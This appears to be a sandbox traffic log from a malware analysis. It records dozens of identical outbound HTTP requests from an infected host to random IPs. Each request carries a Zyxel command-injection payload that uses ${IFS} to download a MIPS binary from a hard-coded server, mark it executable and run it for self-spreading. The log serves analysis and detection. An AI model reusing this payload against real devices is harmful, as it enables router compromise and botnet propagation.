                                    Jan 13, 2024 19:02:41.345395088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6125192.168.2.134076225.190.177.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345478058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6126192.168.2.1335748103.138.178.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345530033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6127192.168.2.135326812.57.17.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345591068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6128192.168.2.1354414132.186.220.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345649004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6129192.168.2.133685852.102.18.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345711946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6130192.168.2.135831252.208.112.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345779896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6131192.168.2.1358622171.198.217.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345801115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6132192.168.2.1343142147.94.111.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345859051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6133192.168.2.1360244199.46.54.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345921993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6134192.168.2.1354812208.133.66.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345972061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6135192.168.2.13539341.146.110.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346035957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6136192.168.2.1345616118.88.223.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346096039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6137192.168.2.1356598169.80.35.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346154928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6138192.168.2.1350800168.36.107.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346191883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6139192.168.2.134501073.112.13.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346245050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6140192.168.2.1354762200.237.52.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346318007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6141192.168.2.1335558103.28.140.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346383095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6142192.168.2.135928832.181.7.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346452951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6143192.168.2.1340736186.191.22.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346499920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6144192.168.2.135895465.98.146.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346551895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6145192.168.2.1356050153.154.158.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346628904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6146192.168.2.1348404104.167.60.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346689939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6147192.168.2.134864835.76.162.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346729040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6148192.168.2.133920645.66.5.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346776009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6149192.168.2.135751285.125.34.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346852064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6150192.168.2.1339082187.42.144.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346934080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6151192.168.2.1342624169.170.250.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.346987963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6152192.168.2.1345272128.38.125.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347045898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6153192.168.2.1335660179.89.194.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347074032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6154192.168.2.1347292156.115.15.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347167969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6155192.168.2.133754614.235.183.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347187042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6156192.168.2.1344318177.241.146.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347250938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6157192.168.2.135553851.192.207.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347297907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6158192.168.2.134383264.115.97.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347357035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6159192.168.2.133718469.23.149.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347428083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6160192.168.2.134056074.185.61.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347492933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6161192.168.2.1346958131.111.21.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347542048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6162192.168.2.1341832184.7.21.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347599030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6163192.168.2.1337722113.32.176.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347647905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6164192.168.2.135546872.205.49.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347712040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6165192.168.2.13345745.227.32.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347754002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6166192.168.2.1335180139.163.25.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347786903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6167192.168.2.133379068.88.90.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347851038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6168192.168.2.1353170160.213.225.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347910881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6169192.168.2.133718831.74.164.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.347980022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6170192.168.2.135189223.199.233.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348047972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6171192.168.2.133797689.213.193.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348112106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6172192.168.2.1356460182.228.83.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348133087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6173192.168.2.135284050.252.68.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348213911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6174192.168.2.1354342216.96.233.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348268986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6175192.168.2.1343402174.155.96.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348310947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6176192.168.2.133327051.10.181.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348371029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6177192.168.2.1358940115.186.119.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348454952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6178192.168.2.135864627.17.27.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348507881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6179192.168.2.13347244.254.170.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348578930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6180192.168.2.1334152159.35.61.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348633051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6181192.168.2.133768668.110.92.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348697901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6182192.168.2.1334388134.98.238.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348737001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6183192.168.2.1337626144.201.227.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348788023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6184192.168.2.1337000138.208.128.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348839998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6185192.168.2.1334122202.170.108.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348870039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6186192.168.2.134494268.60.69.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.348934889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6187192.168.2.1340322130.140.151.222443
                                    TimestampBytes transferredDirectionData
